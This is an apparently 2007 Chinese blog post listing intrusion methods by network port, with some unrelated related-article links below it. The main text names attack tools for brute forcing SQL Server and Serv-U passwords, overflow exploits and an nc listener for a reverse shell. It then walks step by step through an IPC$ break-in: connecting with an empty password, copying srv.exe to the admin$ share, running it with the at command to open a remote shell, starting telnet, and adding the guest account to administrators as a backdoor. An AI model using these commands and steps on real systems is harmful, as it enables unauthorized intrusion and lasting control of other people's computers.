各个网络端口的入侵方法

原创 2007年09月30日 08:41:00
 

1. 1433端口

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello溢出漏 洞入侵

nc -vv -l -p 本机端口 sqlhelloF.exe入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。

9. 3127等端口

 

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

1. C:/>net use $">//127.0.0.1/IPC$ "" /user:"admintitrators"

    这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:/>copy srv.exe $">//127.0.0.1/admin$

  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:/winnt/system32/,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:/>net time file://127.0.0.1/

     查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:/>at file://127.0.0.1/ 11:05 srv.exe

        用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.

5. C:/>net time file://127.0.0.1/

     再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:/>telnet 127.0.0.1 99

  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:/>copy ntlm.exe $">//127.0.0.1/admin$

  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:/WINNT/system32>ntlm

  输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

10. C:/>net user guest /active:yes

  将对方的Guest用户激活

11. C:/>net user guest 1234

  将Guest的密码改为1234,或者你要设定的密码

12. C:/>net localgroup administrators guest /add

  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

局域网内配置服务器方法--p2p技术、端口映射、网络域名

最近公司要求在内网搭建服务器提供给外网使用,最主要就是在出差时能过方便的提供数据查看服务。局域网里面的PC机的IP地址只是用来内部地址区分的(内网IP),一般都为192.168.1.XX,当要和外网建...

网络主机和交换机端口位置的有效定位方法

网络主机和交换机端口位置的有效定位方法   《快速查找交换机端口》2007-7月A  刊登与《网管员世界》杂志 ISSN 1671-2919 维普咨询VIP收录   前段时间发生了这样一件事,...
  • lcgweb
  • lcgweb
  • 2014年05月19日 19:09
  • 471

Linux防火墙iptables开放网络端口的方法

Linux防火墙iptables开放网络端口的方法 1. 编辑vi /etc/sysconfig/iptables文件,如: -A RH-Firewall-1-INPUT -m state...

windows 下查询网络端口以及任务杀死的方法

三个命令 : netstat,tasklist ,taskkill              常用子操作                            netstat -ano -p tc...

华海VIP教程--网络端口入侵教程4

  • 2012年06月25日 10:48
  • 20.95MB
  • 下载

华海VIP教程--网络端口入侵教程2

  • 2012年06月25日 10:44
  • 23.96MB
  • 下载

经验总结 黑客入侵网络的50种方法3

45.解决TCP/IP筛选 在注册表里有三处,分别是:   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip  HKEY_LOCAL_MAC...

IP别名+TCP转发+端口映射实现跨网络访问[原创]

一、背景环境:   1、都是Linux服务器;   2、“服务器A”与“服务器C”不在同一网络,两者之间是不通的;   3、“服务器A”、“服务器C”分别与“服务器B”相通。   二、要实...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:各个网络端口的入侵方法
举报原因:
原因补充:

(最多只允许输入30个字)